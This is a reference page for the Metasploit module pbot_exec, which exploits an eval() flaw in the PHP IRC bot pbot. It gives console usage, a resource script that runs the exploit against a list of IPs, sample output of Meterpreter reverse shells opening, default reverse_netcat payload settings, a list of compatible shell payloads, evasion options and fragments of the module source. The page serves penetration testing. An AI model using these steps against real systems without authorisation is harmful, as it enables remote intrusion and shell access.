PHP IRC Bot pbot eval() Remote Code Execution - Metasploit


This page contains detailed information about how to use the exploit/multi/misc/pbot_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: PHP IRC Bot pbot eval() Remote Code Execution
Module: exploit/multi/misc/pbot_exec
Source code: modules/exploits/multi/misc/pbot_exec.rb
Disclosure date: 2009-11-02
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix, Windows
Target service / protocol: -
Target network port(s): 6667
List of CVEs: -

This module allows remote command execution on the PHP IRC bot pbot by abusing the usage of eval() in the implementation of the .php command. In order to work, the data to connect to the IRC server and channel where find pbot must be provided. The module has been successfully tested on the version of pbot analyzed by Jay Turla, and published on Infosec Institute, running over Ubuntu 10.04 and Windows XP SP3.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using pbot_exec against a single host

Normally, you can use exploit/multi/misc/pbot_exec this way:

msf > use exploit/multi/misc/pbot_exec
msf exploit(pbot_exec) > show targets
    ... a list of targets ...
msf exploit(pbot_exec) > set TARGET target-id
msf exploit(pbot_exec) > show options
    ... show and set options ...
msf exploit(pbot_exec) > exploit

Using pbot_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your pbot_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/misc/pbot_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the multi/misc/pbot_exec exploit module looks in the msfconsole:

msf6 > use exploit/multi/misc/pbot_exec

[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/misc/pbot_exec) > show info

       Name: PHP IRC Bot pbot eval() Remote Code Execution
     Module: exploit/multi/misc/pbot_exec
   Platform: Unix, Windows
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2009-11-02

Provided by:
  evilcry
  Jay Turla
  bwall
  juan vazquez <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   pbot

Check supported:
  Yes

Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  CHANNEL        #channel         yes       IRC Channel
  IRC_PASSWORD                    no        IRC Connection Password
  NICK           msf_user         yes       IRC Nickname
  PBOT_PASSWORD                   no        pbot Password
  RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT          6667             yes       The target port (TCP)

Payload information:
  Space: 344
  Avoid: 0 characters

Description:
  This module allows remote command execution on the PHP IRC bot pbot 
  by abusing the usage of eval() in the implementation of the .php 
  command. In order to work, the data to connect to the IRC server and 
  channel where find pbot must be provided. The module has been 
  successfully tested on the version of pbot analyzed by Jay Turla, 
  and published on Infosec Institute, running over Ubuntu 10.04 and 
  Windows XP SP3.

References:
  OSVDB (84913)
  https://www.exploit-db.com/exploits/20168
  http://resources.infosecinstitute.com/pbot-analysis/

Module Options


This is a complete list of options available in the multi/misc/pbot_exec exploit:

msf6 exploit(multi/misc/pbot_exec) > show options

Module options (exploit/multi/misc/pbot_exec):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   CHANNEL        #channel         yes       IRC Channel
   IRC_PASSWORD                    no        IRC Connection Password
   NICK           msf_user         yes       IRC Nickname
   PBOT_PASSWORD                   no        pbot Password
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          6667             yes       The target port (TCP)

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   pbot

Advanced Options


Here is a complete list of advanced options supported by the multi/misc/pbot_exec exploit:

msf6 exploit(multi/misc/pbot_exec) > show advanced

Module advanced options (exploit/multi/misc/pbot_exec):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_netcat):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/misc/pbot_exec module can exploit:

msf6 exploit(multi/misc/pbot_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   pbot

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/misc/pbot_exec exploit:

msf6 exploit(multi/misc/pbot_exec) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   3   payload/cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   4   payload/cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   5   payload/cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   6   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   7   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   8   payload/cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   9   payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   10  payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   11  payload/cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   12  payload/cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   13  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   14  payload/cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   15  payload/cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   16  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   17  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   18  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   19  payload/cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   20  payload/cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   21  payload/cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   22  payload/cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   23  payload/cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   24  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   25  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   26  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   27  payload/cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   28  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   29  payload/cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   30  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   31  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   32  payload/cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   33  payload/cmd/unix/reverse_ssh                                 normal  No     Unix Command Shell, Reverse TCP SSH
   34  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   35  payload/cmd/unix/reverse_tclsh                               normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   36  payload/cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   37  payload/cmd/windows/adduser                                  normal  No     Windows Execute net user /ADD CMD
   38  payload/cmd/windows/bind_lua                                 normal  No     Windows Command Shell, Bind TCP (via Lua)
   39  payload/cmd/windows/bind_perl                                normal  No     Windows Command Shell, Bind TCP (via Perl)
   40  payload/cmd/windows/bind_perl_ipv6                           normal  No     Windows Command Shell, Bind TCP (via perl) IPv6
   41  payload/cmd/windows/bind_ruby                                normal  No     Windows Command Shell, Bind TCP (via Ruby)
   42  payload/cmd/windows/download_eval_vbs                        normal  No     Windows Executable Download and Evaluate VBS
   43  payload/cmd/windows/download_exec_vbs                        normal  No     Windows Executable Download and Execute (via .vbs)
   44  payload/cmd/windows/generic                                  normal  No     Windows Command, Generic Command Execution
   45  payload/cmd/windows/reverse_lua                              normal  No     Windows Command Shell, Reverse TCP (via Lua)
   46  payload/cmd/windows/reverse_perl                             normal  No     Windows Command, Double Reverse TCP Connection (via Perl)
   47  payload/cmd/windows/reverse_ruby                             normal  No     Windows Command Shell, Reverse TCP (via Ruby)

Evasion Options


Here is the full list of possible evasion options supported by the multi/misc/pbot_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/misc/pbot_exec) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<RHOST>:<RPORT> - Connection to the IRC Server not allowed


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Connection to the IRC Server not allowed" error message:

70:	  def check
71:	    connect
72:	
73:	    response = register(sock)
74:	    if response =~ /463/ or response =~ /464/
75:	      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
76:	      return Exploit::CheckCode::Unknown
77:	    end
78:	
79:	    response = join(sock)
80:	    if not response =~ /353/ and not response =~ /366/

<RHOST>:<RPORT> - Error joining the <CHANNEL> channel


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Error joining the <CHANNEL> channel" error message:

76:	      return Exploit::CheckCode::Unknown
77:	    end
78:	
79:	    response = join(sock)
80:	    if not response =~ /353/ and not response =~ /366/
81:	      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
82:	      return Exploit::CheckCode::Unknown
83:	    end
84:	    response = pbot_login(sock)
85:	    quit(sock)
86:	    disconnect

The nick is longer than 9 characters, using <NICK>


Here is a relevant code snippet related to the "The nick is longer than 9 characters, using <NICK>" error message:

113:	      msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
114:	    end
115:	
116:	    if datastore['NICK'].length > 9
117:	      nick = rand_text_alpha(9)
118:	      print_error("The nick is longer than 9 characters, using #{nick}")
119:	    else
120:	      nick = datastore['NICK']
121:	    end
122:	
123:	    msg << "NICK #{nick}\r\n"

<RHOST>:<RPORT> - Connection to the IRC Server not allowed


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Connection to the IRC Server not allowed" error message:

159:	    connect
160:	
161:	    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
162:	    response = register(sock)
163:	    if response =~ /463/ or response =~ /464/
164:	      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
165:	      return
166:	    end
167:	
168:	    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
169:	    response = join(sock)

<RHOST>:<RPORT> - Error joining the <CHANNEL> channel


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Error joining the <CHANNEL> channel" error message:

166:	    end
167:	
168:	    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
169:	    response = join(sock)
170:	    if not response =~ /353/ and not response =~ /366/
171:	      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
172:	      return
173:	    end
174:	
175:	    print_status("#{rhost}:#{rport} - Registering with the pbot...")
176:	    response = pbot_login(sock)

<RHOST>:<RPORT> - Error registering with the pbot


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Error registering with the pbot" error message:

173:	    end
174:	
175:	    print_status("#{rhost}:#{rport} - Registering with the pbot...")
176:	    response = pbot_login(sock)
177:	    if not response =~ /auth/ or not response =~ /logged in/
178:	      print_error("#{rhost}:#{rport} - Error registering with the pbot")
179:	      return
180:	    end
181:	
182:	    print_status("#{rhost}:#{rport} - Exploiting the pbot...")
183:	    pbot_command(sock)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • evilcry
  • Jay Turla
  • bwall
  • juan vazquez

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.